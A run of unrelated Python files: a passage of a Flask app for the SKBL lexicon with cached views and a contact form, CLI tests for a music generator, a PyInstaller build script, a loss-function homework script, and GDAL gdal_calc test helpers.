            client.set(helpers.cache_name("map", lang), art, time=current_app.config["CACHE_TIME"])
    except Exception:
        # TODO what to do?
        pass
    return art
def compute_place(lang="", cache=True, url=""):
    """Compute place view."""
    helpers.set_language_switch_link("place_index", lang=lang)
    art, lang = getcache("place", lang, cache)
    if art is not None:
        return art
    infotext = helpers.get_infotext("place", request.url_rule.rule)

    def parse(kw):
        # May be used to parse names with or without coordinates:
        # "Lysekil" or "Lysekil|58.275573|11.435558"
        place = kw.get("key")
        if "|" in place:
            name, lat, lon = place.split("|")
        else:
            name, lat, lon = place.strip(), 0, 0
        # Fall back to coordinates when the name is empty.
        return {"name": name if name else "%s, %s" % (lat, lon),
                "lat": lat, "lon": lon,
                "count": kw.get("doc_count")}

    def has_name(kw):
        # Keep only entries with a usable (non-placeholder) name.
        name = kw.get("key").split("|")[0]
        if name and "(<NAME>)" not in name:
            return name
        return None

    # To use the coordinates, use "getplaces" instead of "getplacenames"
    data = helpers.karp_query("getplacenames/" + current_app.config["KARP_MODE"], {})
    stat_table = [parse(kw) for kw in data["places"] if has_name(kw)]
    art = render_template("places.html",
                          places=stat_table,
                          title=gettext("Placenames"),
                          infotext=infotext,
                          description=helpers.get_shorttext(infotext),
                          page_url=url)
    try:
        with g.mc_pool.reserve() as client:
            client.set(helpers.cache_name("place", lang), art, time=current_app.config["CACHE_TIME"])
    except Exception:
        # TODO what to do?
        pass
    return art
def compute_artikelforfattare(infotext="", description="", lang="", cache=True, url=""):
    """Compute authors view."""
    helpers.set_language_switch_link("articleauthor_index", lang=lang)
    art, lang = getcache("author", lang, cache)
    if art is not None:
        return art
    q_data = {"buckets": "artikel_forfattare_fornamn.bucket,artikel_forfattare_efternamn.bucket"}
    data = helpers.karp_query("statlist", q_data)
    # strip kw0 to get correct sorting
    stat_table = [[kw[0].strip()] + kw[1:] for kw in data["stat_table"] if kw[0] != ""]
    # Reorder to "Lastname," firstname, count.
    stat_table = [[kw[1] + ",", kw[0], kw[2]] for kw in stat_table]
    # Remove duplicates and some wrong ones (because of backend limitation)
    # For articles that have more than one author the non existing name
    # combinations are listed here.
    # IDIOM: a set suffices for the membership tests below — the old code
    # used a dict mapping every name to True.
    stoplist = {
        "Grevesmühl,Kajsa",
        "Ohrlander,Anders",
        "Petré,Stefan",
        "Hammenbeck,Margareta",
        "<NAME>",
        "Burström,Nanouschka",
        "Ljung,Yvonne",
        "Lindholm,Barbro",
        "Formark,Fredrik",
        "Mandelin,Bodil",
        "Sedin,Els-Marie",
        "Rådström,Inger",
        "Mannerheim,Madeleine",
        "Kleberg,Ylva",
        "Kärnekull,Anneka ",
        "Kärnekull,Ingrid",
        "Kärnekull,Paul",
        "Kärnekull,Per",
        "Lewis,Ingrid",
        "Lewis,Kerstin",
        "Lewis,Paul",
        "Lewis,Per",
        "Rydberg,Anette",
        "Rydberg,Anneka",
        "Rydberg,Kerstin",
        "Rydberg,Paul",
        "Rydberg,Per",
        "Anderson,Anneka",
        "Anderson,Ingrid",
        "Anderson,Kerstin",
    }
    seen = set()
    new_stat_table = []
    for item in stat_table:
        fullname = item[0] + item[1]
        if fullname not in seen and fullname not in stoplist:
            new_stat_table.append(item)
            seen.add(fullname)
    art = render_template("bucketresults.html", results=new_stat_table,
                          alphabetical=True, title=gettext("Article authors"),
                          name="articleauthor", infotext=infotext,
                          description=description, sortnames=True,
                          page_url=url)
    try:
        with g.mc_pool.reserve() as client:
            client.set(helpers.cache_name("author", lang), art, time=current_app.config["CACHE_TIME"])
    except Exception:
        # TODO what to do?
        pass
    return art
def bucketcall(queryfield="", name="", title="", sortby="", lastnamefirst=False,
               infotext="", description="", query="", alphabetical=False,
               insert_entries=None, page_url=""):
    """Bucket call helper: query a bucket field and render the results."""
    q_data = {"buckets": "%s.bucket" % queryfield}
    if query:
        q_data["q"] = query
    data = helpers.karp_query("statlist", q_data)
    # Strip kw0 to get correct sorting
    stat_table = [[kw[0].strip()] + kw[1:] for kw in data["stat_table"] if kw[0] != ""]
    # Insert entries that function as references
    if insert_entries:
        stat_table.extend(insert_entries)
    # Sort by the caller-supplied key, defaulting to the first column.
    stat_table.sort(key=sortby if sortby else lambda x: x[0])
    if lastnamefirst:
        stat_table = [[kw[1] + ",", kw[0], kw[2]] for kw in stat_table]
    return render_template("bucketresults.html", results=stat_table,
                           alphabetical=alphabetical, title=gettext(title),
                           name=name, infotext=infotext,
                           description=description,
                           page_url=page_url)
def compute_emptycache(fields):
    """
    Empty the cache (but leave the backupfields).
    Only users with write permission may do this
    May raise error, eg if the authorization does not work
    """
    auth = request.authorization
    user, pw = auth.username, auth.password
    # Authenticate against the external auth service.
    postdata = {
        "username": user,
        "password": pw,
        "checksum": md5(user.encode() + pw.encode() + current_app.config["SECRET_KEY"].encode()).hexdigest(),
    }
    server = current_app.config["WSAUTH_URL"]
    contents = urlopen(server, urllib.parse.urlencode(postdata).encode()).read()
    auth_response = json.loads(contents)
    lexitems = auth_response.get("permitted_resources", {})
    rights = lexitems.get("lexica", {}).get(current_app.config["KARP_LEXICON"], {})
    if not rights.get("write"):
        return False
    # Drop both language variants of every requested field.
    with g.mc_pool.reserve() as client:
        for field in fields:
            client.delete(field + "sv")
            client.delete(field + "en")
    return True
def compute_contact_form():
    """Compute view for contact form ."""
    helpers.set_language_switch_link("contact")
    email = request.form["email"].strip()
    required_fields = ["name", "email"]
    # The form mode decides which extra fields are mandatory.
    if request.form["mode_switch"] == "suggest_new":
        mode = "suggestion"
        required_fields.extend(["subject_name", "subject_lifetime",
                                "subject_activity", "motivation"])
    elif request.form["mode_switch"] == "correction":
        mode = "correction"
        required_fields.append("message")
    else:
        mode = "other"
        required_fields.append("message")
    error_msgs = []
    errors = []
    for field in required_fields:
        if not request.form[field]:
            error_msgs.append(gettext("Please enter all the fields!"))
            errors.append(field)
    if email and not helpers.is_email_address_valid(email):
        error_msgs.append(gettext("Please enter a valid email address!"))
    # Render error messages and tell user what went wrong
    error_msgs = list(set(error_msgs))
    if error_msgs:
        # IDIOM: `"x" in errors` is already a bool; the previous
        # `True if ... else False` wrappers were redundant.
        return render_template("contact.html",
                               title=gettext("Contact"),
                               headline=gettext("Contact SKBL"),
                               errors=error_msgs,
                               name_error="name" in errors,
                               email_error="email" in errors,
                               message_error="message" in errors,
                               subject_name_error="subject_name" in errors,
                               subject_lifetime_error="subject_lifetime" in errors,
                               subject_activity_error="subject_activity" in errors,
                               motivation_error="motivation" in errors,
                               form_data=request.form,
                               mode=mode)
    else:
        return make_email(request.form, mode)
def make_email(form_data, mode="other"):
    """Compose and send an email from the contact form.

    :param form_data: Submitted form; must contain "name" and "email"
        plus the mode-specific message/suggestion fields.
    :param mode: "suggestion", "correction" or "other"; selects the
        mail subject and body template.
    :return: Rendered feedback page for the user.
    """
    name = form_data["name"].strip()
    email = form_data["email"].strip()
    recipient = current_app.config["EMAIL_RECIPIENT"]
    complete_sender = "%s <%s>" % (name, email)
    # If the email address contains non-ascii chars it won't be accepted by
    # the server as sender. Non-ascii chars in the name will produce
    # weirdness in the from-field.
    if helpers.is_ascii(email) and helpers.is_ascii(name):
        sender = complete_sender
    elif helpers.is_ascii(email):
        sender = email
    else:
        sender = recipient
    if mode == "suggestion":
        text = ["%s har skickat in ett förslag för en ny SKBL-ingång.\n\n" % complete_sender]
        text.append("Förslag på kvinna: %s\n" % form_data["subject_name"])
        text.append("Kvinnas levnadstid: %s\n" % form_data["subject_lifetime"])
        text.append("Kvinnas verksamhet: %s\n" % form_data["subject_activity"])
        text.append("Motivering: %s\n" % form_data["motivation"])
        text = "".join(text)
        subject = "Förslag för ny ingång i skbl.se"
    elif mode == "correction":
        text = "%s har skickat följande meddelande:\n\n%s" % (complete_sender, form_data["message"])
        subject = "Förslag till rättelse (skbl.se)"
    else:
        text = "%s har skickat följande meddelande:\n\n%s" % (complete_sender, form_data["message"])
        subject = "Förfrågan från skbl.se"
    # Plain-text and HTML alternatives of the same body.
    html = text.replace("\n", "<br>")
    part1 = MIMEText(text, "plain", "utf-8")
    part2 = MIMEText(html, "html", "utf-8")
    msg = MIMEMultipart("alternative")
    msg.attach(part1)
    msg.attach(part2)
    msg["Subject"] = subject
    msg["To"] = recipient
    msg["From"] = sender
    # Fix: use the SMTP context manager so the connection is closed (QUIT)
    # even when sendmail() raises.
    with smtplib.SMTP(current_app.config["EMAIL_SERVER"]) as server:
        server.sendmail(sender, recipient, msg.as_string())
    # Render user feedback
    return render_template("form_submitted.html",
                           title=gettext("Thank you for your feedback") + "!",
                           headline=gettext("Thank you for your feedback") + ", " + name + "!",
                           text=gettext("We will get back to you as soon as we can."))
|
# -*- coding: utf-8 -*-
"""Tests for the cli module"""
import pytest
from bach_generator import cli
def test_no_filepath():
    """Parsing with no positional filepath must abort with a usage error."""
    parser = cli.construct_parser()
    with pytest.raises(SystemExit):
        # parse_args expects a list of tokens; the original passed "" (a
        # str), which only worked because iterating an empty string also
        # yields no arguments.
        parser.parse_args([])
@pytest.mark.parametrize(
    "input_args, expected",
    [("a", "a"), ("test_dir/test.midi", "test_dir/test.midi")],
)
def test_filepath(input_args, expected):
    """The positional argument is stored as args.filepath."""
    namespace = cli.construct_parser().parse_args(input_args.split())
    assert namespace.filepath == expected
@pytest.mark.parametrize(
    "input_args, expected",
    [("a --generations 12", 12), ("a -g 3", 3)],
)
def test_generations(input_args, expected):
    """--generations / -g is parsed into args.generations."""
    namespace = cli.construct_parser().parse_args(input_args.split())
    assert namespace.generations == expected
@pytest.mark.parametrize(
    "input_args, expected",
    [("a", False), ("a --save", True)],
)
def test_save(input_args, expected):
    """--save is an off-by-default boolean flag."""
    namespace = cli.construct_parser().parse_args(input_args.split())
    assert namespace.save == expected
@pytest.mark.parametrize(
    "input_args, expected",
    [("a", None), ("a --load test.json", "test.json")],
)
def test_load(input_args, expected):
    """--load stores its path in args.load_filepath (defaults to None)."""
    namespace = cli.construct_parser().parse_args(input_args.split())
    assert namespace.load_filepath == expected
@pytest.mark.parametrize(
    "input_args, expected",
    [("a", None), ("a --load-best 23", 23)],
)
def test_load_best(input_args, expected):
    """--load-best is parsed into args.load_best (defaults to None)."""
    namespace = cli.construct_parser().parse_args(input_args.split())
    assert namespace.load_best == expected
@pytest.mark.parametrize(
    "input_args, expected",
    [("a --models 234", 234), ("a -m 4", 4)],
)
def test_models(input_args, expected):
    """--models / -m is parsed into args.models."""
    namespace = cli.construct_parser().parse_args(input_args.split())
    assert namespace.models == expected
@pytest.mark.parametrize(
    "input_args, expected",
    [("a --inputs 234", 234), ("a -i 45", 45)],
)
def test_inputs(input_args, expected):
    """--inputs / -i is parsed into args.inputs."""
    namespace = cli.construct_parser().parse_args(input_args.split())
    assert namespace.inputs == expected
@pytest.mark.parametrize(
    "input_args, expected",
    [("a --layers 2", 2), ("a -l 56", 56)],
)
def test_layers(input_args, expected):
    """--layers / -l is parsed into args.layers."""
    namespace = cli.construct_parser().parse_args(input_args.split())
    assert namespace.layers == expected
@pytest.mark.parametrize(
    "input_args, expected",
    [("a --layer-size 23", 23), ("a -ls 56", 56)],
)
def test_layer_size(input_args, expected):
    """--layer-size / -ls is parsed into args.layer_size."""
    namespace = cli.construct_parser().parse_args(input_args.split())
    assert namespace.layer_size == expected
@pytest.mark.parametrize(
    "input_args, expected",
    [("a --select-models 26", 26), ("a -s 56", 56)],
)
def test_select_models(input_args, expected):
    """--select-models / -s is parsed into args.select_models."""
    namespace = cli.construct_parser().parse_args(input_args.split())
    assert namespace.select_models == expected
@pytest.mark.parametrize(
    "input_args, expected",
    [("a --clones 8", 8), ("a -c 98", 98)],
)
def test_clones(input_args, expected):
    """--clones / -c is parsed into args.clones."""
    namespace = cli.construct_parser().parse_args(input_args.split())
    assert namespace.clones == expected
@pytest.mark.parametrize(
    "input_args, expected",
    [("a --weight-jumble-by=factor", "factor"), ("a -wj=selection", "selection")],
)
def test_weight_jumble_strategy(input_args, expected):
    """--weight-jumble-by / -wj stores its choice in args.weight_jumble_strategy."""
    namespace = cli.construct_parser().parse_args(input_args.split())
    assert namespace.weight_jumble_strategy == expected
@pytest.mark.parametrize(
    "input_args",
    ["a --weight-jumble-by=factor3", "a -wj"],
)
def test_weight_jumble_strategy_fail(input_args):
    """An invalid or valueless --weight-jumble-by aborts parsing."""
    with pytest.raises(SystemExit):
        cli.construct_parser().parse_args(input_args.split())
@pytest.mark.parametrize(
    "input_args, expected",
    [("a --weight-divergence 0.1", 0.1), ("a -wd=-0.5", -0.5)],
)
def test_weight_divergence(input_args, expected):
    """--weight-divergence / -wd is parsed as a float, negatives included."""
    namespace = cli.construct_parser().parse_args(input_args.split())
    assert namespace.weight_divergence == expected
@pytest.mark.parametrize(
    "input_args, expected",
    [("a --write-interval 4", 4), ("a -wi 23", 23)],
)
def test_write_interval(input_args, expected):
    """--write-interval / -wi is parsed into args.write_interval."""
    namespace = cli.construct_parser().parse_args(input_args.split())
    assert namespace.write_interval == expected
@pytest.mark.parametrize(
    "input_args, expected",
    [("a --output-dir abc", "abc"), ("a -o b", "b")],
)
def test_output_dir(input_args, expected):
    """--output-dir / -o is parsed into args.output_dir."""
    namespace = cli.construct_parser().parse_args(input_args.split())
    assert namespace.output_dir == expected
@pytest.mark.parametrize(
    "input_args, expected",
    [("a --rhythm simple", "simple"), ("a -r copy", "copy")],
)
def test_rhythm(input_args, expected):
    """--rhythm / -r stores its choice in args.rhythm_handler."""
    namespace = cli.construct_parser().parse_args(input_args.split())
    assert namespace.rhythm_handler == expected
@pytest.mark.parametrize(
    "input_args",
    ["a --rhythm ere", "a -r"],
)
def test_rhythm_fail(input_args):
    """An unknown or valueless --rhythm choice aborts parsing."""
    with pytest.raises(SystemExit):
        cli.construct_parser().parse_args(input_args.split())
@pytest.mark.parametrize(
    "input_args, expected",
    [("a", None), ("a --seed 2", 2)],
)
def test_seed(input_args, expected):
    """--seed is parsed into args.seed (defaults to None)."""
    namespace = cli.construct_parser().parse_args(input_args.split())
    assert namespace.seed == expected
def test_display_args():
    """Smoke test: display_args runs on a parsed namespace without raising."""
    namespace = cli.construct_parser().parse_args(["a"])
    cli.display_args(namespace)
|
<filename>pyinstaller_exe.py<gh_stars>1-10
#!/usr/bin/env python3
"""Generate .exe files with PyInstaller."""
from os import devnull, getcwd, listdir, makedirs, remove
from os.path import basename, exists, join
from platform import architecture
from shutil import copy, copytree, rmtree
from subprocess import STDOUT, call
from requests import certs, get
from bbarchivist.bbconstants import (CAP, COMMITDATE, JSONDIR, LONGVERSION, VERSION)
from bbarchivist.utilities import get_seven_zip, prep_seven_zip
__author__ = "Thurask"
__license__ = "WTFPL v2"
__copyright__ = "2016-2019 Thurask"
def write_versions():
    """
    Write temporary version files (version.txt and longversion.txt).
    """
    with open("version.txt", "w") as verfile:
        verfile.write(VERSION)
    # Long version plus commit date on a second line.
    with open("longversion.txt", "w") as longfile:
        longfile.write("{0}\n{1}".format(LONGVERSION, COMMITDATE))
def clean_versions():
    """
    Remove the temporary version files created by write_versions().
    """
    for tempname in ("version.txt", "longversion.txt"):
        remove(tempname)
def is_64bit():
    """
    Return True when running on a 64-bit Python build.

    :rtype: bool
    """
    # architecture()[0] is e.g. "64bit"/"32bit"; the comparison already
    # yields a bool, so the original "True if ... else False" was redundant.
    return architecture()[0] == "64bit"
def bit_tail():
    """
    Return the bitness suffix used in artifact names: "x64" or "x86".
    """
    return "x64" if is_64bit() else "x86"
def bitsdir(indir):
    """
    Create a per-bitness directory based on indir ("-64" appended on
    64-bit systems), wiping any previous contents first.

    :param indir: Directory to modify.
    :type indir: str

    :return: The (re)created directory name.
    """
    indirx = "{0}-64".format(indir) if is_64bit() else indir
    # clean_outdir() already checks for existence itself, so the extra
    # exists() guard the original had was redundant.
    clean_outdir(indirx)
    makedirs(indirx)
    return indirx
def get_ucrt_dlls():
    """
    Return the folder holding the Windows 10 UCRT redistributable DLLs.
    """
    arch_tail = bit_tail()
    # On 64-bit hosts the Windows Kits live under "Program Files (x86)".
    pfiles = "Program Files (x86)" if arch_tail == "x64" else "Program Files"
    return join("C:\\", pfiles, "Windows Kits", "10", "Redist",
                "ucrt", "DLLs", arch_tail)
def generate_specs():
    """
    Generate pyinstaller spec files.

    Writes one "<script>.<x86|x64>.spec" file per console script, with the
    current directory and the UCRT DLL folder on the analysis path.
    """
    # Console entry points shipped by bbarchivist; one spec file each.
    scripts = ["archivist", "autolookup", "barlinker", "carrierchecker", "certchecker", "devloader", "downloader", "droidlookup", "droidscraper", "escreens", "kernchecker", "lazyloader", "linkgen", "metachecker", "swlookup", "tclscan", "tcldelta", "tclnewprd"]
    # Backslashes are doubled because these paths are embedded as Python
    # string literals inside the generated spec source.
    here = getcwd().replace("\\", "\\\\")
    dlldir = get_ucrt_dlls().replace("\\", "\\\\")
    tail = bit_tail()
    for script in scripts:
        # One-file PyInstaller spec template; {0}=script, {1}=cwd, {2}=DLL dir.
        template = "# -*- mode: python -*-\n\nblock_cipher = None\n\n\na = Analysis(['bbarchivist\\\\scripts\\\\{0}.py'],\n             pathex=['{1}', '{2}'],\n             binaries=None,\n             datas=None,\n             hiddenimports=[],\n             hookspath=[],\n             runtime_hooks=[],\n             excludes=[],\n             win_no_prefer_redirects=False,\n             win_private_assemblies=False,\n             cipher=block_cipher)\npyz = PYZ(a.pure, a.zipped_data,\n             cipher=block_cipher)\nexe = EXE(pyz,\n          a.scripts,\n          a.binaries,\n          a.zipfiles,\n          a.datas,\n          name='{0}',\n          debug=False,\n          strip=False,\n          upx=False,\n          console=True )\n".format(script, here, dlldir)
        with open("{0}.{1}.spec".format(script, tail), "w") as afile:
            afile.write(template)
def clean_specs():
    """
    Remove the pyinstaller spec files for the current bitness.
    """
    suffix = "{0}.spec".format(bit_tail())
    for spec in [fname for fname in listdir() if fname.endswith(suffix)]:
        remove(spec)
def get_sevenzip():
    """
    Get 7-Zip, downloading it if preparation succeeds.

    :raises SystemError: when the download cannot be prepared.
    """
    szver = "1900"
    szurl = "http://www.7-zip.org/a/7z{0}-extra.7z".format(szver)
    if prep_seven_zip():
        get_sevenzip_write(szurl)
    else:
        print("GO TO {0} AND DO IT MANUALLY".format(szurl))
        raise SystemError
def get_sevenzip_write(szurl):
    """
    Download the 7-Zip archive, extract it into ./7z, delete the archive.

    :param szurl: Link to 7z download.
    :type szurl: str
    """
    szexe = get_seven_zip()
    szfile = basename(szurl)
    with open(szfile, "wb") as afile:
        # Close the HTTP response deterministically; stream in 1 KiB
        # chunks to avoid holding the whole archive in memory.
        with get(szurl, stream=True) as req:
            for chunk in req.iter_content(chunk_size=1024):
                afile.write(chunk)
    cmd = "{0} x {1} -o7z".format(szexe, szfile)
    with open(devnull, "wb") as dnull:
        call(cmd, stdout=dnull, stderr=STDOUT, shell=True)
    # Reuse szfile instead of recomputing basename(szurl).
    remove(szfile)
def call_specs(distdir, builddir):
    """
    Call pyinstaller on every spec file for the current bitness.

    :param distdir: Path to distribute files.
    :type distdir: str

    :param builddir: Path to build files.
    :type builddir: str
    """
    suffix = "{0}.spec".format(bit_tail())
    # use UPX 3.93 or up
    for spec in [fname for fname in listdir() if fname.endswith(suffix)]:
        cmd = "pyinstaller --onefile --workpath {2} --distpath {1} {0}".format(spec, distdir, builddir)
        call(cmd, shell=True)
def sz_wrapper(outdir):
    """
    Copy 7-Zip to outdir, silently skipping when the download fails.

    :param outdir: Output directory.
    :type outdir: str
    """
    try:
        get_sevenzip()
    except SystemError:
        # Best-effort: 7-Zip is optional in the bundle.
        return
    sz_wrapper_writer(outdir)
def sz_wrapper_writer(outdir):
    """
    Copy the extracted 7-Zip binaries into outdir, then remove ./7z.

    :param outdir: Output directory.
    :type outdir: str
    """
    transfers = [(join("7z", "7za.exe"), outdir)]
    if is_64bit():
        # Ship the 64-bit binary under a distinct name next to the 32-bit one.
        transfers.append((join("7z", "x64", "7za.exe"), join(outdir, "7za64.exe")))
    for source, destination in transfers:
        copy(source, destination)
    rmtree("7z", ignore_errors=True)
def copy_json(outdir):
    """
    Copy the bundled JSON data folder to outdir/json.

    :param outdir: Output directory.
    :type outdir: str
    """
    # copytree requires that outdir/json does not exist yet; bitsdir()
    # recreates outdir empty, so that holds in the normal build flow.
    copytree(JSONDIR, join(outdir, "json"))
def clean_outdir(outdir):
    """
    Remove outdir and all of its contents, tolerating a missing directory.

    :param outdir: Output directory.
    :type outdir: str
    """
    # rmtree(ignore_errors=True) already tolerates a non-existent path,
    # so the original exists() guard was redundant.
    rmtree(outdir, ignore_errors=True)
def main():
    """
    Create .exes with dynamic spec files.

    Builds per-bitness dist/build directories, generates one spec per
    script, runs pyinstaller, then bundles version info, cap, the JSON
    data, CA certificates and 7-Zip next to the executables.
    """
    outdir = bitsdir("pyinst-dist")
    builddir = bitsdir("pyinst-build")
    write_versions()
    generate_specs()
    call_specs(outdir, builddir)
    copy("version.txt", outdir)
    copy("longversion.txt", outdir)
    copy(CAP.location, outdir)
    copy_json(outdir)
    # requests' CA bundle, shipped so the frozen exes can do HTTPS.
    copy(certs.where(), join(outdir, "cacerts.pem"))
    sz_wrapper(outdir)
    # Temporary build inputs are no longer needed once the exes exist.
    clean_versions()
    clean_specs()


if __name__ == "__main__":
    main()
|
#coding=utf8
"""
Created on Thu Mar 12 17:48:23 2020
@author: <NAME>
Hint max() is a built-in function in Python
"""
import pickle
import matplotlib.pyplot as plt
import numpy as np
def hinge_loss(f_x, y_true, margin=1):
    """
    Compute the hinge loss max(0, margin - y_true * f_x).

    :param f_x: Value returned by a linear discriminant function on x.
    :param y_true: True label, expected in {-1, +1}.
    :param margin: Margin of the hinge (default 1).
    :return: Non-negative loss; 0 when the sample is classified with margin.
    """
    # Removed leftover "# pass #++insert your code here...++" scaffold.
    return max(0, margin - y_true * f_x)
def zero_one_loss(f_x, y_true):
    """
    Return the zero-one loss: 1 for a misclassification, otherwise 0.

    A sample counts as correct when f_x and y_true agree in sign
    (f_x == 0 is treated as correct).
    """
    return 0 if f_x * y_true >= 0 else 1
# Load the 2-d feature matrix and the label vector for question 2.
# NOTE(review): the filename "Q2_fetures.pkl" looks misspelled
# ("features") — confirm the pickle on disk really uses this name.
with open('Q2_fetures.pkl','rb') as rf:
    X = pickle.load(rf)
with open('Q2_labels.pkl','rb') as rf:
    Y_true = pickle.load(rf)
# Remap labels from {0, 1} to {-1, +1} as required by the hinge loss.
Y_true[Y_true==0]=-1
print(len(X),len(Y_true))
def linear_func(W, X):
    """
    Evaluate the 2-d linear discriminant w0 + w1*x0 + w2*x1.

    :param W: Weight triple (w0, w1, w2), w0 being the intercept.
    :param X: Feature pair (x0, x1).
    """
    intercept, w_1, w_2 = W[0], W[1], W[2]
    return intercept + w_1 * X[0] + w_2 * X[1]
def boundary_line(W, x):
    """Return x1 on the decision boundary w0 + w1*x + w2*x1 = 0."""
    return -(W[0] + W[1] * x) / W[2]
# Reference weight vector; the derivation of its boundary line follows.
W = (-0.45236953,2.23604794, -3.94803128)
#f(x) = -0.45236953+2.23604794*X[0]-3.94803128*X[1] = 0
# ->3.94803128*X[1] = -0.45236953+2.23604794*X[0]
# y = (-0.45236953+2.23604794*x)/3.94803128
plt.figure(1, figsize=(8, 8))
# Scatter the samples, colored by their (+1/-1) label.
plt.scatter(X[:, 0], X[:, 1], c=Y_true)
#generate dense plots
s = np.arange(min(X[:, 0]),max(X[:, 0]),0.1)
#generate the corresponding y for each z in s
t = []
for z in s:
    t.append((-0.45236953+2.23604794*z)/3.94803128)
#plt.plot(s, t,label = 'W')
#
# NOTE(review): these three assignments are immediately overwritten by the
# W1/W2/W3 triple a few lines below (only the last set takes effect).
W1 = (-0.762686,1.50126098,-2.3948365 )
W2 = (-0.422686,1.50126098,-2.3948365 )
W3 = (-0.59862686,1.50126098,-2.3948365)
# W1 = (-0.5986268-1,1.50126098,-2.3948365 )
# W2 = (-0.5986268+1,1.50126098,-2.3948365 )
# W3 = (-0.59862686,1.50126098,-2.3948365 )
# Effective candidates: same slope, intercepts shifted by +/-0.17.
W1 = (-0.59862686-0.17,1.50126098,-2.3948365 )
W2 = (-0.59862686+0.17,1.50126098,-2.3948365 )
W3 = (-0.59862686,1.50126098,-2.3948365 )
# Draw the decision boundary of each candidate weight vector.
for W, label in zip((W1,W2,W3), ('W1','W2','W3')):
    # zip pairs each weight tuple with its plot label.
    t = [boundary_line(W, x) for x in s]
    plt.plot(s, t, label = label)
plt.legend()
plt.show()
# Reference: zip(*iterables) returns an iterator of tuples in which the
# i-th element comes from the i-th iterable; it stops as soon as the
# shortest iterable is exhausted and then raises StopIteration.
# zip pairs up entries of the same index across the iterables.
# zip.__next__() is equivalent to next(); both raise StopIteration once
# the iteration has finished.
# Compute the total zero-one loss of each candidate over the data set.
print("\nZero one loss:")
for W, label in zip((W1,W2,W3), ('W1','W2','W3')):  # pair each W with its label
    zero_one_loss_total = 0
    for i in range(len(X)):
        x_i = X[i]
        f_x_i=linear_func(W,x_i)
        y_i = Y_true[i]
        loss = zero_one_loss(f_x_i,y_i)
        # Only misclassified samples (loss == 1) contribute.
        if loss >0:
            # print(i,f_x_i,y_i,loss)
            zero_one_loss_total+=loss
    print(label, zero_one_loss_total)
# Compute the total hinge loss (margin 1) of each candidate.
print("\nHinge loss:")
for W, label in zip((W1,W2,W3), ('W1','W2','W3')):
    hinge_loss_total = 0
    for i in range(len(X)):
        x_i = X[i]
        f_x_i=linear_func(W,x_i)
        y_i = Y_true[i]
        loss = hinge_loss(f_x_i,y_i,1)
        # Samples inside the margin or misclassified contribute positively.
        if loss >0:
            hinge_loss_total+=loss
    print(label, hinge_loss_total)
|
<reponame>nicoguillier/gdal<filename>autotest/pyscripts/test_gdal_calc.py
#!/usr/bin/env pytest
# -*- coding: utf-8 -*-
###############################################################################
# $Id: test_gdal_calc.py 25549 2013-01-26 11:17:10Z rouault $
#
# Project: GDAL/OGR Test Suite
# Purpose: gdal_calc.py testing
# Author: <NAME> <etourigny dot dev @ gmail dot com>
#
###############################################################################
# Copyright (c) 2013, <NAME> <<EMAIL>>
# Copyright (c) 2014, <NAME> <etourigny dot dev @ <EMAIL> dot <EMAIL>>
# Copyright (c) 2020, <NAME> <<EMAIL>>
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the "Software"),
# to deal in the Software without restriction, including without limitation
# the rights to use, copy, modify, merge, publish, distribute, sublicense,
# and/or sell copies of the Software, and to permit persons to whom the
# Software is furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
# OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL
# THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER
# DEALINGS IN THE SOFTWARE.
###############################################################################
import os
import shutil
from copy import copy
from osgeo import gdal
import test_py_scripts
import pytest
from collections import defaultdict
# test that numpy is available, if not skip all tests
try:
    import numpy as np
    from osgeo.utils import gdal_calc
    from osgeo.gdal_array import GDALTypeCodeToNumericTypeCode
    numpy_available = True
except (ImportError, AttributeError):
    # numpy or the gdal python utilities are missing; every test below
    # checks this flag and calls pytest.skip() accordingly.
    numpy_available = False
# Usage: gdal_calc.py [-A <filename>] [--A_band] [-B...-Z filename] [other_options]
def check_file(filename_or_ds, checksum, i=None, bnd_idx=1):
    """Open filename_or_ds (path or dataset) and verify a band checksum.

    When checksum is None the computed value is only printed, which is
    handy for producing expected values.  Returns the opened dataset.
    """
    is_path = gdal_calc.is_path_like(filename_or_ds)
    ds = gdal.Open(filename_or_ds) if is_path else filename_or_ds
    assert ds is not None, 'ds{} not found'.format(i if i is not None else '')
    ds_checksum = ds.GetRasterBand(bnd_idx).Checksum()
    if checksum is None:
        print('ds{} bnd{} checksum is {}'.format(i, bnd_idx, ds_checksum))
    else:
        assert ds_checksum == checksum, 'ds{} bnd{} wrong checksum, expected {}, got {}'.format(i, bnd_idx, checksum, ds_checksum)
    return ds
# Per-test-id counters used to generate unique temp filenames.
temp_counter_dict = defaultdict(int)
# Running counter for --optfile temp files.
opts_counter_counter = 0
# Band checksums of ../gcore/data/stefan_full_rgba.tif (bands 1-4).
input_checksum = (12603, 58561, 36064, 10807)
def get_input_file():
    """Copy the reference RGBA image into tmp/ once and return its path."""
    # test_id 0 always maps to the same shared filename.
    infile = make_temp_filename(0)
    if not os.path.isfile(infile):
        shutil.copy('../gcore/data/stefan_full_rgba.tif', infile)
    return infile
def format_temp_filename(test_id, idx, is_opt=False):
    """Build the temp filename for (test_id, idx).

    Opt-files use their own 'tmp/opt<idx>' scheme; test_id 0 maps to the
    shared input filename without a suffix.
    """
    if is_opt:
        return 'tmp/opt{}'.format(idx)
    suffix = '' if test_id == 0 else '_{}_{}'.format(test_id, idx)
    return 'tmp/test_gdal_calc_py{}.tif'.format(suffix)
def make_temp_filename(test_id, is_opt=False):
    """Return the next unique temp filename for test_id, bumping a counter.

    test_id 0 is special: its counter is pinned to 1, so every caller
    receives the same shared input filename.
    """
    if not is_opt:
        global temp_counter_dict
        # For test_id == 0 the previous count is ignored, so idx stays 1.
        temp_counter_dict[test_id] = 1 + (temp_counter_dict[test_id] if test_id else 0)
        idx = temp_counter_dict[test_id]
    else:
        global opts_counter_counter
        # Opt files share a single global counter across all tests.
        opts_counter_counter = opts_counter_counter + 1
        idx = opts_counter_counter
    return format_temp_filename(test_id, idx, is_opt)
